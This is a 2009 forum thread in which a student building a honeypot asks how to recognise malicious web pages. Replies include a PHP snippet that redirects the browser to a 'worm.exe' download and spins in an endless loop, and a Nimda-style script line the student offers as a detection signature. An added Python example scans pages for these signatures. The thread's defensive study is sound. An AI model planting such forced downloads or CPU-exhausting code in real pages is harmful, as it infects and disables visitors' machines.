8 Replies - 1792 Views - Last Post: 14 June 2009 - 02:43 AM

#1 naseem.fci

How can an IDS detect malicious web pages?

Posted 03 May 2009 - 02:23 PM

I need some help.
My question is: "how can an intrusion detection
system (IDS) analyse web pages in order to identify
malicious ones"?

I know that the system can monitor the changes
on the registry, file system, etc. But I am
asking about the second way, in which the system knows
the content of the page.

In other words:
"What are the features or properties of malicious
web pages?"
"Is it necessary to know all features of all computer worms, viruses, trojan horses, etc.? If so, I want help with how I can identify the features of each."

Thank you.


Replies To: How can an IDS detect malicious web pages?

#2 BlakeJustBlake

Posted 03 May 2009 - 03:17 PM

Sounds like someone's homework.

#3 no2pencil

Posted 04 May 2009 - 12:18 PM

naseem.fci, on 3 May, 2009 - 03:23 PM, said:

my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to identify
malicious ones"?

An IDS detects intrusions, hence the name. It doesn't look at websites.


BlakeJustBlake, on 3 May, 2009 - 04:17 PM, said:

Sounds like someone's homework.

That explains why it was posted in *Student Campus*

I'll move it to Networking.

#4 naseem.fci

Posted 05 May 2009 - 05:32 AM

It seems that you don't understand me!

I will explain:

I'm a student in the faculty of computer and information sciences. We are asked to do team work projects; I'm a member of the group working on the "honey net" project. We have source code that simulates a honeypot which visits an initial specified web page, checks it, then collects the links inside it in order to visit each one next, and repeats this for every page.

The honeypot runs each visited page and monitors the changes in memory and CPU resources; it also checks for file system changes. It puts limits on the consumption of each resource; if these limits are exceeded, it decides that the visited page is malicious.

The future work that we want to achieve is to make the honeypot analyse the web page and examine its content in order to know if it contains a computer worm, virus, trojan horse, etc.

I was asked to do a search to find specific features of the pages that contain harmful content.

I searched for that, but I found that most information talks about the harmful effects of those malicious contents; I can't extract the specific features or properties of the malicious contents, so I don't know how the honeypot can detect these pages.

I don't want you to do my work; I am asking for ideas or starting points from which I can continue in the right way.

Thanks.

#5 numeric

Posted 07 May 2009 - 04:24 PM

Pretty much anything on a web page can contain harmful content - links, images, even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring what's being sent to and from your test computer and through which ports, in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n

#6 DingleNutZ

Posted 04 June 2009 - 05:56 PM

PHP pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php

// automated download: redirect the browser straight to an executable
header("Location: http://www.page.com/worm.exe");

// extensive CPU usage: a loop that never terminates
$i = 0;
do { $i = $i + 1; } while (true);

?>

JavaScript could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isn't how it would pick it up

#7 naseem.fci

Posted 14 June 2009 - 12:39 AM

numeric, on 7 May, 2009 - 03:24 PM, said:

Pretty much anything on a web page can contain harmful content - links, images, even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring what's being sent to and from your test computer and through which ports, in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n


So sorry for being late in replying.
I was in exams.
Thanks very much for your offer.
I will send you an e-mail.


DingleNutZ, on 4 Jun, 2009 - 04:56 PM, said:

PHP pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php

// automated download: redirect the browser straight to an executable
header("Location: http://www.page.com/worm.exe");

// extensive CPU usage: a loop that never terminates
$i = 0;
do { $i = $i + 1; } while (true);

?>

JavaScript could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isn't how it would pick it up


Thanks very much.
We have made some progress in our project.
I will explain in the next reply.

#8 naseem.fci

Posted 14 June 2009 - 01:17 AM

We have arrived at a specific point in our project.

Each internet worm or virus has its own signature. We decided to search for these signatures and use them as a criterion that distinguishes a malicious page from others.

We already have some signatures, such as:

* The signature of the Nimda worm:

<script language="Javascript">
windows.open("readme.eml",null,"resizable=no, top=6000, left=6000")
</script>

My question here is: can we pass this signature to a method in our code so that the system can check for this text in the web page, or must we use a regular expression for each signature?

Sorry for the nuisance.
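Added example (not part of the thread and not the project's honeypot code): one way to handle the question in post #8 is to pass fixed-text signatures to a single method that compares them after normalizing case and whitespace, and to keep regular expressions for signatures with variable parts. The signature string is copied as posted; the class, the rule names, the generic `.eml` rule and the sample pages are assumptions constructed for illustration.

```python
import re

# Signature text copied verbatim from the post above.
NIMDA_SIG = 'windows.open("readme.eml",null,"resizable=no, top=6000, left=6000")'

def normalize(text):
    """Lowercase and drop all whitespace so re-spacing or re-casing cannot hide a match."""
    return re.sub(r"\s+", "", text).lower()

class SignatureScanner:
    def __init__(self):
        self.literals = {}  # name -> normalized literal text
        self.patterns = {}  # name -> compiled regex

    def add_literal(self, name, signature):
        # Fixed-text signature: no regex needed, just normalize once on load.
        self.literals[name] = normalize(signature)

    def add_regex(self, name, pattern):
        # Regex is only for signatures with variable parts.
        self.patterns[name] = re.compile(pattern, re.IGNORECASE | re.DOTALL)

    def scan(self, page):
        """Return the sorted names of all signatures found in the page source."""
        flat = normalize(page)
        hits = [n for n, s in self.literals.items() if s in flat]
        hits += [n for n, p in self.patterns.items() if p.search(page)]
        return sorted(hits)

def build_scanner():
    scanner = SignatureScanner()
    scanner.add_literal("nimda-readme-eml", NIMDA_SIG)
    # Hypothetical generic rule (not from the thread): any script call that opens an .eml file.
    scanner.add_regex("popup-opens-eml", r"""\.open\s*\(\s*["'][^"']+\.eml["']""")
    return scanner

# Constructed sample pages.
PAGE_EXACT = '<script language="Javascript">\n' + NIMDA_SIG + "\n</script>"
PAGE_RESPACED = ('<SCRIPT>WINDOWS.OPEN( "readme.eml" , null,\n'
                 ' "resizable=no,top=6000,left=6000" )</SCRIPT>')
PAGE_VARIANT = '<script>window.open("notes.eml", null, "resizable=no")</script>'
PAGE_BENIGN = '<html><a href="readme.txt">readme</a></html>'

if __name__ == "__main__":
    s = build_scanner()
    for name in ("PAGE_EXACT", "PAGE_RESPACED", "PAGE_VARIANT", "PAGE_BENIGN"):
        page = globals()[name]
        print(name, "naive:", NIMDA_SIG in page, "scanner:", s.scan(page))
```

A plain `NIMDA_SIG in page` test finds only the byte-identical copy; the normalized comparison also catches the re-spaced, re-cased page, and the regex rule covers the variant that shares no fixed text with the literal.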

#9 naseem.fci

Posted 14 June 2009 - 02:43 AM

Sorry numeric, it seems that I misunderstood what your blog means!

Please tell me how I can send you an e-mail.